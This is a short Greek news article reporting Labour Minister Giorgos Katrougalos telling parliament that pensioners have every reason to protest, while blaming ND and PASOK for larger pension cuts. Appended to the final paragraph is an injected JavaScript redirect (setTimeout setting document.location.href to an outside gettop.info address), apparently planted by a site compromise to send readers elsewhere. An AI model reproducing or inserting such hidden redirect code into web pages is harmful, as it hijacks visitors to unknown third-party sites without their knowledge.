Κατρούγκαλος στη Βουλή: Κάθε λόγο να διαμαρτύρονται οι συνταξιούχοι

0
7

 

Στο πλαίσιο επερώτησης για το ασφαλιστικό ο υπουργός Εργασίας Γιώργος Κατρούγκαλος τόνισε ότι «oι συνταξιούχοι έχουν κάθε λόγο να διαμαρτύρονται… Τα δικά μας μέτρα ήταν η σταγόνα που έκανε το ποτήρι να ξεχειλίσει».

«Εμείς επιβάλλαμε τη μικρότερη δυνατή προσαρμογή. Οι συνταξιούχοι έχουν κάθε λόγο να διαμαρτύρονται. Μπορεί τα δικά μας μέτρα να είναι σταγόνα σε σχέση με τα δικά σας αλλά ηταν η σταγόνα που ξεχείλισε το ποτήρι» και συμπλήρωσε.

Μάλιστα, επιτέθηκε σε ΝΔ και ΠΑΣΟΚ υποστηρίζοντας ότι τα μέτρα που έλαβαν την περίοδο 2010-2015 επέφεραν πολλαπλάσιο πλήγμα στους συνταξιούχους χωρίς μάλιστα να διασφαλίσουν την βιωσιμότητα των Ταμείων.

Απευθυνόμενος στη Δημοκρατική Συμπαράταξη που κατέθεσε την επερώτηση είπε: «Δεν ντραπήκατε να την καταθέσετε την ερώτηση. Το ΠΑΣΟΚ έχει την ευθύνη για την δημιουργία των δομικών αιτιών της κρίσης. Κλέψατε 44 δισ. ευρώ από τις τσέπες των συνταξιούχων. Στα 1,1 δισ. ευρώ ανέρχονται οι συνέπειες του δικού μας νόμου και στα 698 εκατ. ευρώ οι μετέπειτα παρεμβάσεις στον νόμο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here